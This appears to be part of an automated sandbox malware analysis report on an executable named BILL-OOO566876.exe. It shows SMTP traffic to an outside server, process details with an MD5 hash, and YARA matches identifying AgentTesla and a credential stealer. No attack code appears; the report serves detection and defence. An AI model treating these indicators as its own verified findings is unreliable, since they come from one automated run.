Apr 12, 2021 15:18:43.771477938 CEST  49739        587        192.168.2.3      208.91.199.225   DATA
Apr 12, 2021 15:18:43.946533918 CEST  587          49739      208.91.199.225   192.168.2.3      354 End data with <CR><LF>.<CR><LF>
Apr 12, 2021 15:18:43.960582018 CEST  49739        587        192.168.2.3      208.91.199.225   .
Apr 12, 2021 15:18:44.231465101 CEST  587          49739      208.91.199.225   192.168.2.3      250 2.0.0 Ok: queued as A9165781F07

Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 15:17:04
Start date: 12/04/2021
Path: C:\Users\user\Desktop\BILL-OOO566876.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\BILL-OOO566876.exe'
Imagebase: 0x7e0000
File size: 893952 bytes
MD5 hash: 1C84862E5B015BCECF6A194D17172DCF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 15:17:12
Start date: 12/04/2021
Path: C:\Users\user\Desktop\BILL-OOO566876.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0x630000
File size: 893952 bytes
MD5 hash: 1C84862E5B015BCECF6A194D17172DCF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

Disassembly

Code Analysis
